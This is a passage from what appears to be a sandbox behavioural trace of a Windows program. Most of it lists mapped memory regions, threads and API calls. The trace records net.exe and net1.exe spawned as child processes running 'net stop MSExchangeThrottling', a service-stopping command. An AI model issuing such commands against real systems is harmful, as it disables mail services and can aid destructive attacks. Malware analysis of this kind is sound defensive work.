(normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 12484 start_va = 0x7ffc02100000 end_va = 0x7ffc0215afff entry_point = 0x7ffc02100000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 12485 start_va = 0x7ffc02160000 end_va = 0x7ffc022bbfff entry_point = 0x7ffc02160000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 12486 start_va = 0x7ffc037f0000 end_va = 0x7ffc03974fff entry_point = 0x7ffc037f0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 12487 start_va = 0x7ffc03bb0000 end_va = 0x7ffc03cf0fff entry_point = 0x7ffc03bb0000 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 12488 start_va = 0x7ffc03d00000 end_va = 0x7ffc03dbdfff entry_point = 0x7ffc03d00000 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll") Region: id = 12489 start_va = 0x7ffc03dc0000 end_va = 0x7ffc03e6cfff entry_point = 0x7ffc03dc0000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Thread: id = 759 os_tid = 0x65c Thread: id = 760 os_tid = 0xd50 Thread: id = 761 os_tid = 0xb4c Process: id = "263" image_name = "net.exe" filename = "c:\\windows\\syswow64\\net.exe" page_root = "0x15f90000" os_pid = "0xd90" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "261" os_parent_pid = "0x764" cmd_line = "net stop MSExchangeThrottling" cur_dir = "C:\\Users\\CIiHmnxMn6Ps\\Desktop\\" os_username = "LHNIWSJ\\CIiHmnxMn6Ps" os_groups = "LHNIWSJ\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0001714b" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 12503 start_va = 0x220000 end_va = 0x239fff entry_point = 0x220000 region_type = mapped_file name = "net.exe" filename = "\\Windows\\SysWOW64\\net.exe" (normalized: "c:\\windows\\syswow64\\net.exe") Region: id = 12504 start_va = 0x3d0000 end_va = 0x43cffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003d0000" filename = "" Region: id = 12505 start_va = 0x43d0000 end_va = 0x43effff entry_point = 0x0 region_type = private name = "private_0x00000000043d0000" filename = "" Region: id = 12506 start_va = 0x43f0000 end_va = 0x43f1fff entry_point = 0x0 region_type = private name = "private_0x00000000043f0000" filename = "" Region: id = 12507 start_va = 0x4400000 end_va = 0x4413fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004400000" filename = "" Region: id = 12508 start_va = 0x4420000 end_va = 0x445ffff entry_point = 0x0 region_type = private name = "private_0x0000000004420000" filename = "" Region: id = 12509 start_va = 0x4460000 end_va = 0x44dffff entry_point = 0x0 region_type = private name = "private_0x0000000004460000" filename = "" Region: id = 12510 start_va = 0x44e0000 end_va = 0x44e3fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044e0000" filename = "" Region: id = 12511 start_va = 0x44f0000 end_va = 0x44f0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 12512 start_va = 0x4500000 end_va = 0x4501fff entry_point = 0x0 region_type = private name = "private_0x0000000004500000" filename = "" Region: id = 12513 start_va = 0x77c40000 end_va = 0x77db8fff entry_point = 0x77c40000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 12514 start_va = 0x7f110000 end_va = 0x7f132fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f110000" filename = "" Region: id = 12515 start_va = 0x7f134000 end_va = 0x7f134fff entry_point = 0x0 region_type = private name = "private_0x000000007f134000" filename = "" Region: id = 12516 start_va = 0x7f13a000 end_va = 0x7f13afff entry_point = 0x0 region_type = private name = "private_0x000000007f13a000" filename = "" Region: id = 12517 start_va = 0x7f13d000 end_va = 0x7f13ffff entry_point = 0x0 region_type = private name = "private_0x000000007f13d000" filename = "" Region: id = 12518 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 12519 start_va = 0x7fff0000 end_va = 0x7dfc03e6ffff entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 12520 start_va = 0x7dfc03e70000 end_va = 0x7ffc03e6ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007dfc03e70000" filename = "" Region: id = 12521 start_va = 0x7ffc03e70000 end_va = 0x7ffc04031fff entry_point = 0x7ffc03e70000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 12522 start_va = 0x7ffc04032000 end_va = 0x7ffffffeffff entry_point = 0x0 region_type = private name = "private_0x00007ffc04032000" filename = "" Region: id = 12523 start_va = 0x4510000 end_va = 0x451ffff entry_point = 0x0 region_type = private name = "private_0x0000000004510000" filename = "" Region: id = 12524 start_va = 0x59300000 end_va = 0x5934efff entry_point = 0x59300000 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 12525 start_va = 0x59360000 end_va = 0x593d2fff entry_point = 0x59360000 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 12526 start_va = 0x4640000 end_va = 0x473ffff entry_point = 0x0 region_type = private name = "private_0x0000000004640000" filename = "" Region: id = 12527 start_va = 0x59350000 end_va = 0x59357fff entry_point = 0x59350000 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Thread: id = 763 os_tid = 0x5c0 Thread: id = 764 os_tid = 0xd84 Process: id = "264" image_name = "net1.exe" filename = "c:\\windows\\syswow64\\net1.exe" page_root = "0x15856000" os_pid = "0x53c" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "263" os_parent_pid = "0xd90" cmd_line = "C:\\Windows\\system32\\net1 stop MSExchangeThrottling" cur_dir = "C:\\Users\\CIiHmnxMn6Ps\\Desktop\\" os_username = "LHNIWSJ\\CIiHmnxMn6Ps" os_groups = "LHNIWSJ\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0001714b" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 12528 start_va = 0x160000 end_va = 0x17ffff entry_point = 0x0 region_type = private name = "private_0x0000000000160000" filename = "" Region: id = 12529 start_va = 0x180000 end_va = 0x181fff entry_point = 0x0 region_type = private name = "private_0x0000000000180000" filename = "" Region: id = 12530 start_va = 0x190000 end_va = 0x1a3fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000190000" filename = "" Region: id = 12531 start_va = 0x1b0000 end_va = 0x1effff entry_point = 0x0 region_type = private name = "private_0x00000000001b0000" filename = "" Region: id = 12532 start_va = 0x1f0000 end_va = 0x26ffff entry_point = 0x0 region_type = private name = "private_0x00000000001f0000" filename = "" Region: id = 12533 start_va = 0x270000 end_va = 0x273fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000270000" filename = "" Region: id = 12534 start_va = 0x280000 end_va = 0x280fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000280000" filename = "" Region: id = 12535 start_va = 0x290000 end_va = 0x291fff entry_point = 0x0 region_type = private name = "private_0x0000000000290000" filename = "" Region: id = 12536 start_va = 0x1080000 end_va = 0x10b1fff entry_point = 0x1080000 region_type = mapped_file name = "net1.exe" filename = "\\Windows\\SysWOW64\\net1.exe" (normalized: "c:\\windows\\syswow64\\net1.exe") Region: id = 12537 start_va = 0x10c0000 end_va = 0x50bffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000010c0000" filename = "" Region: id = 12538 start_va = 0x77c40000 end_va = 0x77db8fff entry_point = 0x77c40000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 12539 start_va = 0x7e790000 end_va = 0x7e7b2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007e790000" filename = "" Region: id = 12540 start_va = 0x7e7b8000 end_va = 0x7e7b8fff entry_point = 0x0 region_type = private name = "private_0x000000007e7b8000" filename = "" Region: id = 12541 start_va = 0x7e7bc000 end_va = 0x7e7befff entry_point = 0x0 region_type = private name = "private_0x000000007e7bc000" filename = "" Region: id = 12542 start_va = 0x7e7bf000 end_va = 0x7e7bffff entry_point = 0x0 region_type = private name = "private_0x000000007e7bf000" filename = "" Region: id = 12543 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 12544 start_va = 0x7fff0000 end_va = 0x7dfc03e6ffff entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 12545 start_va = 0x7dfc03e70000 end_va = 0x7ffc03e6ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007dfc03e70000" filename = "" Region: id = 12546 start_va = 0x7ffc03e70000 end_va = 0x7ffc04031fff entry_point = 0x7ffc03e70000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 12547 start_va = 0x7ffc04032000 end_va = 0x7ffffffeffff entry_point = 0x0 region_type = private name = "private_0x00007ffc04032000" filename = "" Region: id = 12548 start_va = 0x370000 end_va = 0x37ffff entry_point = 0x0 region_type = private name = "private_0x0000000000370000" filename = "" Region: id = 12549 start_va = 0x59300000 end_va = 0x5934efff entry_point = 0x59300000 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 12550 start_va = 0x59360000 end_va = 0x593d2fff entry_point = 0x59360000 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 12551 start_va = 0x4b0000 end_va = 0x5affff entry_point = 0x0 region_type = private name = "private_0x00000000004b0000" filename = "" Region: id = 12552 start_va = 0x59350000 end_va = 0x59357fff entry_point = 0x59350000 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 12553 start_va = 0x160000 end_va = 0x16ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000160000" filename = "" Region: id = 12554 start_va = 0x170000 end_va = 0x173fff entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 12555 start_va = 0x2a0000 end_va = 0x35dfff entry_point = 0x2a0000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 12556 start_va = 0x380000 end_va = 0x3bffff entry_point = 0x0 region_type = private name = "private_0x0000000000380000" filename = "" Region: id = 12557 start_va = 0x3c0000 end_va = 0x43ffff entry_point = 0x0 region_type = private name = "private_0x00000000003c0000" filename = "" Region: id = 12558 start_va = 0x760000 end_va = 0x76ffff entry_point = 0x0 region_type = private name = "private_0x0000000000760000" filename = "" Region: id = 12559 start_va = 0x74a00000 end_va = 0x74a2efff entry_point = 0x74a00000 region_type = mapped_file name = "logoncli.dll" filename = "\\Windows\\SysWOW64\\logoncli.dll" (normalized: "c:\\windows\\syswow64\\logoncli.dll") Region: id = 12560 start_va = 0x74a30000 end_va = 0x74a37fff entry_point = 0x74a30000 region_type = mapped_file name = "dsrole.dll" filename = "\\Windows\\SysWOW64\\dsrole.dll" (normalized: "c:\\windows\\syswow64\\dsrole.dll") Region: id = 12561 start_va = 0x74a40000 end_va = 0x74a4efff entry_point = 0x74a40000 region_type = mapped_file name = "browcli.dll" filename = "\\Windows\\SysWOW64\\browcli.dll" (normalized: "c:\\windows\\syswow64\\browcli.dll") Region: id = 12562 start_va = 0x74a50000 end_va = 0x74a63fff entry_point = 0x74a50000 region_type = mapped_file name = "samcli.dll" filename = "\\Windows\\SysWOW64\\samcli.dll" (normalized: "c:\\windows\\syswow64\\samcli.dll") Region: id = 12563 start_va = 0x74ac0000 end_va = 0x74ac9fff entry_point = 0x74ac0000 region_type = mapped_file name = "netutils.dll" filename = "\\Windows\\SysWOW64\\netutils.dll" (normalized: "c:\\windows\\syswow64\\netutils.dll") Region: id = 12564 start_va = 0x74ad0000 end_va = 0x74aebfff entry_point = 0x74ad0000 region_type = mapped_file name = "srvcli.dll" filename = "\\Windows\\SysWOW64\\srvcli.dll" (normalized: "c:\\windows\\syswow64\\srvcli.dll") Region: id = 12565 start_va = 0x74af0000 end_va = 0x74b0afff entry_point = 0x74af0000 region_type = mapped_file name = "bcrypt.dll" filename = "\\Windows\\SysWOW64\\bcrypt.dll" (normalized: "c:\\windows\\syswow64\\bcrypt.dll") Region: id = 12566 start_va = 0x74b10000 end_va = 0x74b1ffff entry_point = 0x74b10000 region_type = mapped_file name = "wkscli.dll" filename = "\\Windows\\SysWOW64\\wkscli.dll" (normalized: "c:\\windows\\syswow64\\wkscli.dll") Region: id = 12567 start_va = 0x74ce0000 end_va = 0x74d38fff entry_point = 0x74ce0000 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\SysWOW64\\bcryptprimitives.dll" (normalized: "c:\\windows\\syswow64\\bcryptprimitives.dll") Region: id = 12568 start_va = 0x74d40000 end_va = 0x74d49fff entry_point = 0x74d40000 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 12569 start_va = 0x74d50000 end_va = 0x74d6dfff entry_point = 0x74d50000 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 12570 start_va = 0x76970000 end_va = 0x76ae5fff entry_point = 0x76970000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 12571 start_va = 0x77250000 end_va = 0x77292fff entry_point = 0x77250000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 12572 start_va = 0x77670000 end_va = 0x7775ffff entry_point = 0x77670000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 12573 start_va = 0x77a10000 end_va = 0x77acdfff entry_point = 0x77a10000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 12574 start_va = 0x77af0000 end_va = 0x77b9bfff entry_point = 0x77af0000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 12575 start_va = 0x7e690000 end_va = 0x7e78ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007e690000" filename = "" Region: id = 12576 start_va = 0x7e7b9000 end_va = 0x7e7bbfff entry_point = 0x0 region_type = private name = "private_0x000000007e7b9000" filename = "" Region: id = 12577 start_va = 0x180000 end_va = 0x183fff entry_point = 0x0 region_type = private name = "private_0x0000000000180000" filename = "" Region: id = 12578 start_va = 0x360000 end_va = 0x362fff entry_point = 0x360000 region_type = mapped_file name = "netmsg.dll" filename = "\\Windows\\SysWOW64\\netmsg.dll" (normalized: "c:\\windows\\syswow64\\netmsg.dll") Region: id = 12579 start_va = 0x440000 end_va = 0x471fff entry_point = 0x440000 region_type = mapped_file name = "netmsg.dll.mui" filename = "\\Windows\\SysWOW64\\en-US\\netmsg.dll.mui" (normalized: "c:\\windows\\syswow64\\en-us\\netmsg.dll.mui") Thread: id = 765 os_tid = 0x8f8 [0141.400] GetModuleHandleA (lpModuleName=0x0) returned 0x1080000 [0141.400] __set_app_type (_Type=0x1) [0141.400] __p__fmode () returned 0x77ac4d6c [0141.400] __p__commode () returned 0x77ac5b1c [0141.400] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x1087020) returned 0x0 [0141.400] __getmainargs (in: _Argc=0x109f688, _Argv=0x109f68c, _Env=0x109f690, _DoWildCard=0, _StartInfo=0x109f69c | out: _Argc=0x109f688, _Argv=0x109f68c, _Env=0x109f690) returned 0 [0141.400] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0141.400] GetConsoleOutputCP () returned 0x1b5 [0141.401] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x10a7020 | out: lpCPInfo=0x10a7020) returned 1 [0141.401] SetThreadUILanguage (LangId=0x0) returned 0x409 [0141.403] sprintf_s (in: _DstBuf=0x26f984, _DstSize=0xc, _Format=".%u" | out: _DstBuf=".437") returned 4 [0141.404] setlocale (category=0, locale=".437") returned="English_United States.437" [0141.405] GetStdHandle (nStdHandle=0xfffffff5) returned 0x3c [0141.405] GetStdHandle (nStdHandle=0xfffffff4) returned 0x40 [0141.405] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop MSExchangeThrottling" [0141.405] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x26f72c, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\net1.exe" (normalized: "c:\\windows\\syswow64\\net1.exe")) returned 0x1c [0141.405] NetApiBufferAllocate (in: ByteCount=0x10, Buffer=0x26f720 | out: Buffer=0x26f720*=0x4b8048) returned 0x0 [0141.405] NetApiBufferAllocate (in: ByteCount=0x10, Buffer=0x26f724 | out: Buffer=0x26f724*=0x4b7fd0) returned 0x0 [0141.405] __iob_func () returned 0x77ac1208 [0141.405] _fileno (_File=0x77ac1208) returned 0 [0141.405] _setmode (_FileHandle=0, _Mode=16384) returned 16384 [0141.405] _wcsicmp (_String1="accounts", _String2="stop") returned -18 [0141.405] _wcsicmp (_String1="computer", _String2="stop") returned -16 [0141.405] _wcsicmp (_String1="config", _String2="stop") returned -16 [0141.405] _wcsicmp (_String1="continue", _String2="stop") returned -16 [0141.405] _wcsicmp (_String1="cont", _String2="stop") returned -16 [0141.405] _wcsicmp (_String1="file", _String2="stop") returned -13 [0141.405] _wcsicmp (_String1="files", _String2="stop") returned -13 [0141.405] _wcsicmp (_String1="group", _String2="stop") returned -12 [0141.405] _wcsicmp (_String1="groups", _String2="stop") returned -12 [0141.405] _wcsicmp (_String1="help", _String2="stop") returned -11 [0141.405] _wcsicmp (_String1="helpmsg", _String2="stop") returned -11 [0141.405] _wcsicmp (_String1="localgroup", _String2="stop") returned -7 [0141.405] _wcsicmp (_String1="pause", _String2="stop") returned -3 [0141.405] _wcsicmp (_String1="session", _String2="stop") returned -15 [0141.405] _wcsicmp (_String1="sessions", _String2="stop") returned -15 [0141.405] _wcsicmp (_String1="sess", _String2="stop") returned -15 [0141.405] _wcsicmp (_String1="share", _String2="stop") returned -12 [0141.405] _wcsicmp (_String1="start", _String2="stop") returned -14 [0141.405] _wcsicmp (_String1="stats", _String2="stop") returned -14 [0141.405] _wcsicmp (_String1="statistics", _String2="stop") returned -14 [0141.405] _wcsicmp (_String1="stop", _String2="stop") returned 0 [0141.405] _wcsicmp (_String1="accounts", _String2="MSExchangeThrottling") returned -12 [0141.405] _wcsicmp (_String1="computer", _String2="MSExchangeThrottling") returned -10 [0141.405] _wcsicmp (_String1="config", _String2="MSExchangeThrottling") returned -10 [0141.405] _wcsicmp (_String1="continue", _String2="MSExchangeThrottling") returned -10 [0141.405] _wcsicmp (_String1="cont", _String2="MSExchangeThrottling") returned -10 [0141.405] _wcsicmp (_String1="file", _String2="MSExchangeThrottling") returned -7 [0141.405] _wcsicmp (_String1="files", _String2="MSExchangeThrottling") returned -7 [0141.405] _wcsicmp (_String1="group", _String2="MSExchangeThrottling") returned -6 [0141.405] _wcsicmp (_String1="groups", _String2="MSExchangeThrottling") returned -6 [0141.405] _wcsicmp (_String1="help", _String2="MSExchangeThrottling") returned -5 [0141.405] _wcsicmp (_String1="helpmsg", _String2="MSExchangeThrottling") returned -5 [0141.405] _wcsicmp (_String1="localgroup", _String2="MSExchangeThrottling") returned -1 [0141.405] _wcsicmp (_String1="pause", _String2="MSExchangeThrottling") returned 3 [0141.405] _wcsicmp (_String1="session", _String2="MSExchangeThrottling") returned 6 [0141.405] _wcsicmp (_String1="sessions", _String2="MSExchangeThrottling") returned 6 [0141.405] _wcsicmp (_String1="sess", _String2="MSExchangeThrottling") returned 6 [0141.405] _wcsicmp (_String1="share", _String2="MSExchangeThrottling") returned 6 [0141.405] _wcsicmp (_String1="start", _String2="MSExchangeThrottling") returned 6 [0141.405] _wcsicmp (_String1="stats", _String2="MSExchangeThrottling") returned 6 [0141.406] _wcsicmp (_String1="statistics", _String2="MSExchangeThrottling") returned 6 [0141.406] _wcsicmp (_String1="stop", _String2="MSExchangeThrottling") returned 6 [0141.406] _wcsicmp (_String1="time", _String2="MSExchangeThrottling") returned 7 [0141.406] _wcsicmp (_String1="user", _String2="MSExchangeThrottling") returned 8 [0141.406] _wcsicmp (_String1="users", _String2="MSExchangeThrottling") returned 8 [0141.406] _wcsicmp (_String1="msg", _String2="MSExchangeThrottling") returned 2 [0141.406] _wcsicmp (_String1="messenger", _String2="MSExchangeThrottling") returned -14 [0141.406] _wcsicmp (_String1="receiver", _String2="MSExchangeThrottling") returned 5 [0141.406] _wcsicmp (_String1="rcv", _String2="MSExchangeThrottling") returned 5 [0141.406] _wcsicmp (_String1="netpopup", _String2="MSExchangeThrottling") returned 1 [0141.406] _wcsicmp (_String1="redirector", _String2="MSExchangeThrottling") returned 5 [0141.406] _wcsicmp (_String1="redir", _String2="MSExchangeThrottling") returned 5 [0141.406] _wcsicmp (_String1="rdr", _String2="MSExchangeThrottling") returned 5 [0141.406] _wcsicmp (_String1=0x1081ffc, _String2="MSExchangeThrottling") returned 10 [0141.406] _wcsicmp (_String1="work", _String2="MSExchangeThrottling") returned 10 [0141.406] _wcsicmp (_String1="wksta", _String2="MSExchangeThrottling") returned 10 [0141.406] _wcsicmp (_String1="prdr", _String2="MSExchangeThrottling") returned 3 [0141.406] _wcsicmp (_String1="devrdr", _String2="MSExchangeThrottling") returned -9 [0141.406] _wcsicmp (_String1="lanmanworkstation", _String2="MSExchangeThrottling") returned -1 [0141.406] _wcsicmp (_String1="server", _String2="MSExchangeThrottling") returned 6 [0141.406] _wcsicmp (_String1="svr", _String2="MSExchangeThrottling") returned 6 [0141.406] _wcsicmp (_String1="srv", _String2="MSExchangeThrottling") returned 6 [0141.406] _wcsicmp (_String1="lanmanserver", _String2="MSExchangeThrottling") returned -1 [0141.406] _wcsicmp (_String1="alerter", _String2="MSExchangeThrottling") returned -12 [0141.406] _wcsicmp (_String1="netlogon", _String2="MSExchangeThrottling") returned 1 [0141.406] _wcsupr (in: _String="MSExchangeThrottling" | out: _String="MSEXCHANGETHROTTLING") returned="MSEXCHANGETHROTTLING" [0141.406] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x80000000) returned 0x4b3450 [0141.408] GetServiceKeyNameW (in: hSCManager=0x4b3450, lpDisplayName="MSEXCHANGETHROTTLING", lpServiceName=0x10a8cb0, lpcchBuffer=0x26f69c | out: lpServiceName="", lpcchBuffer=0x26f69c) returned 0 [0141.408] _wcsicmp (_String1="msg", _String2="MSEXCHANGETHROTTLING") returned 2 [0141.408] _wcsicmp (_String1="messenger", _String2="MSEXCHANGETHROTTLING") returned -14 [0141.408] _wcsicmp (_String1="receiver", _String2="MSEXCHANGETHROTTLING") returned 5 [0141.408] _wcsicmp (_String1="rcv", _String2="MSEXCHANGETHROTTLING") returned 5 [0141.408] _wcsicmp (_String1="redirector", _String2="MSEXCHANGETHROTTLING") returned 5 [0141.408] _wcsicmp (_String1="redir", _String2="MSEXCHANGETHROTTLING") returned 5 [0141.408] _wcsicmp (_String1="rdr", _String2="MSEXCHANGETHROTTLING") returned 5 [0141.408] _wcsicmp (_String1="workstation", _String2="MSEXCHANGETHROTTLING") returned 10 [0141.408] _wcsicmp (_String1="work", _String2="MSEXCHANGETHROTTLING") returned 10 [0141.408] _wcsicmp (_String1="wksta", _String2="MSEXCHANGETHROTTLING") returned 10 [0141.408] _wcsicmp (_String1="prdr", _String2="MSEXCHANGETHROTTLING") returned 3 [0141.408] _wcsicmp (_String1="devrdr", _String2="MSEXCHANGETHROTTLING") returned -9 [0141.408] _wcsicmp (_String1="lanmanworkstation", _String2="MSEXCHANGETHROTTLING") returned -1 [0141.408] _wcsicmp (_String1="server", _String2="MSEXCHANGETHROTTLING") returned 6 [0141.408] _wcsicmp (_String1="svr", _String2="MSEXCHANGETHROTTLING") returned 6 [0141.408] _wcsicmp (_String1="srv", _String2="MSEXCHANGETHROTTLING") returned 6 [0141.408] _wcsicmp (_String1="lanmanserver", _String2="MSEXCHANGETHROTTLING") returned -1 [0141.408] _wcsicmp (_String1="alerter", _String2="MSEXCHANGETHROTTLING") returned -12 [0141.408] _wcsicmp (_String1="netlogon", _String2="MSEXCHANGETHROTTLING") returned 1 [0141.409] _wcsicmp (_String1="MSEXCHANGETHROTTLING", _String2="WORKSTATION") returned -10 [0141.409] _wcsicmp (_String1="MSEXCHANGETHROTTLING", _String2="LanmanWorkstation") returned 1 [0141.409] _wcsicmp (_String1="MSEXCHANGETHROTTLING", _String2="SERVER") returned -6 [0141.409] _wcsicmp (_String1="MSEXCHANGETHROTTLING", _String2="LanmanServer") returned 1 [0141.409] _wcsicmp (_String1="MSEXCHANGETHROTTLING", _String2="BROWSER") returned 11 [0141.409] _wcsicmp (_String1="MSEXCHANGETHROTTLING", _String2="BROWSER") returned 11 [0141.409] _wcsicmp (_String1="MSEXCHANGETHROTTLING", _String2="MESSENGER") returned 14 [0141.409] _wcsicmp (_String1="MSEXCHANGETHROTTLING", _String2="MESSENGER") returned 14 [0141.409] _wcsicmp (_String1="MSEXCHANGETHROTTLING", _String2="NETRUN") returned -1 [0141.409] _wcsicmp (_String1="MSEXCHANGETHROTTLING", _String2="NETRUN") returned -1 [0141.409] _wcsicmp (_String1="MSEXCHANGETHROTTLING", _String2="SPOOLER") returned -6 [0141.409] _wcsicmp (_String1="MSEXCHANGETHROTTLING", _String2="SPOOLER") returned -6 [0141.409] _wcsicmp (_String1="MSEXCHANGETHROTTLING", _String2="ALERTER") returned 12 [0141.409] _wcsicmp (_String1="MSEXCHANGETHROTTLING", _String2="ALERTER") returned 12 [0141.409] _wcsicmp (_String1="MSEXCHANGETHROTTLING", _String2="NETLOGON") returned -1 [0141.409] _wcsicmp (_String1="MSEXCHANGETHROTTLING", _String2="NETLOGON") returned -1 [0141.409] _wcsicmp (_String1="MSEXCHANGETHROTTLING", _String2="NETPOPUP") returned -1 [0141.409] _wcsicmp (_String1="MSEXCHANGETHROTTLING", _String2="NETPOPUP") returned -1 [0141.409] _wcsicmp (_String1="MSEXCHANGETHROTTLING", _String2="SQLSERVER") returned -6 [0141.409] _wcsicmp (_String1="MSEXCHANGETHROTTLING", _String2="SQLSERVER") returned -6 [0141.409] _wcsicmp (_String1="MSEXCHANGETHROTTLING", _String2="REPLICATOR") returned -5 [0141.409] _wcsicmp (_String1="MSEXCHANGETHROTTLING", _String2="REPLICATOR") returned -5 [0141.409] _wcsicmp (_String1="MSEXCHANGETHROTTLING", _String2="REMOTEBOOT") returned -5 [0141.409] _wcsicmp (_String1="MSEXCHANGETHROTTLING", _String2="REMOTEBOOT") returned -5 [0141.409] _wcsicmp (_String1="MSEXCHANGETHROTTLING", _String2="TIMESOURCE") returned -7 [0141.409] _wcsicmp (_String1="MSEXCHANGETHROTTLING", _String2="TIMESOURCE") returned -7 [0141.409] _wcsicmp (_String1="MSEXCHANGETHROTTLING", _String2="AFP") returned 12 [0141.409] _wcsicmp (_String1="MSEXCHANGETHROTTLING", _String2="AFP") returned 12 [0141.409] _wcsicmp (_String1="MSEXCHANGETHROTTLING", 